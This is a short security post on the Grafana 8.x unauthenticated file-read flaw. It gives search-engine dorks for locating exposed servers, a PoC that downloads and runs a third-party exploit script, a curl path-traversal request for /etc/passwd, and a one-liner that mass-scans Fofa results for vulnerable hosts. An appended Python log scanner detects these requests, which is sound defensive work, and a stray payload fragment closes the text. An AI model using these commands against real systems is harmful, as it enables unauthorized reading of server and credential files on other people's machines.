Grafana — Unauthorized Arbitrary File Read
The latest unpatched Grafana 0-day LFI is now being actively exploited; it affects only Grafana 8.0+.
Dorks:
Shodan: title:"Grafana"
Fofa.so: app="Grafana"
ZoomEye: grafana
PoC:
wget https://raw.githubusercontent.com/Gabriel-Lima232/Grafana-LFI-8.x/main/grafana-exploit.py; chmod +x grafana-exploit.py;
python3 grafana-exploit.py http://10.180.47.42:3000 /etc/passwd
OR
curl http://10.180.47.42:3000/public/plugins/welcome/../../../../../../../../../../etc/passwd --path-as-is
One line command to detect:
echo 'app="Grafana"' | fofa -fs 1000 | httpx -status-code -path "/public/plugins/graph/../../../../../../../../etc/passwd" -mc 200 -ms 'root:x:0:0'
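The defender-side counterpart to the requests above: an added example (not part of this post and not Grafana's own code) that scans web-server access logs in Combined Log Format for dot-dot segments under /public/plugins/<name>/, which is exactly where the curl request with --path-as-is leaves them verbatim. The log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Combined Log Format); not from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Dec/2021:10:01:02 +0000] "GET /public/plugins/welcome/../../../../../../../../../../etc/passwd HTTP/1.1" 200 1823 "-" "curl/7.79.1"
10.0.0.6 - - [07/Dec/2021:10:01:05 +0000] "GET /public/plugins/graph/module.js HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
10.0.0.7 - - [07/Dec/2021:10:01:09 +0000] "GET /public/plugins/graph/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1823 "-" "python-requests/2.26"
10.0.0.8 - - [07/Dec/2021:10:01:12 +0000] "GET /api/health HTTP/1.1" 200 15 "-" "kube-probe/1.21"
10.0.0.9 - - [07/Dec/2021:10:01:15 +0000] "GET /public/plugins/welcome/../../etc/passwd HTTP/1.1" 404 0 "-" "curl/7.79.1"
"""

# Pulls client IP, timestamp, request path and status code out of one log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
PLUGIN_PREFIX = re.compile(r'^/public/plugins/[^/]+/')


def is_traversal(raw_path: str) -> bool:
    """True when a /public/plugins/<name>/ request carries a '..' segment.

    The path is URL-decoded twice so %2e%2e and double-encoded variants are
    caught; the query string is ignored because only the path is traversed.
    """
    path = raw_path.split('?', 1)[0]
    decoded = unquote(unquote(path))
    if not PLUGIN_PREFIX.match(decoded):
        return False
    return any(segment == '..' for segment in decoded.split('/'))


def scan(log_text: str) -> list:
    """Return one record per traversal attempt; status 200 means the read likely succeeded."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_traversal(m['path']):
            continue
        hits.append({'ip': m['ip'], 'ts': m['ts'], 'path': m['path'],
                     'status': int(m['status']), 'succeeded': m['status'] == '200'})
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 on such a request is the confirmation signal the httpx one-liner above also keys on; a 404 still records a probe against the instance.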
#grafana #lfi #bugbounty #pentest
Payload: /dashboard/snapshot/*?orgId=0%20/invite/: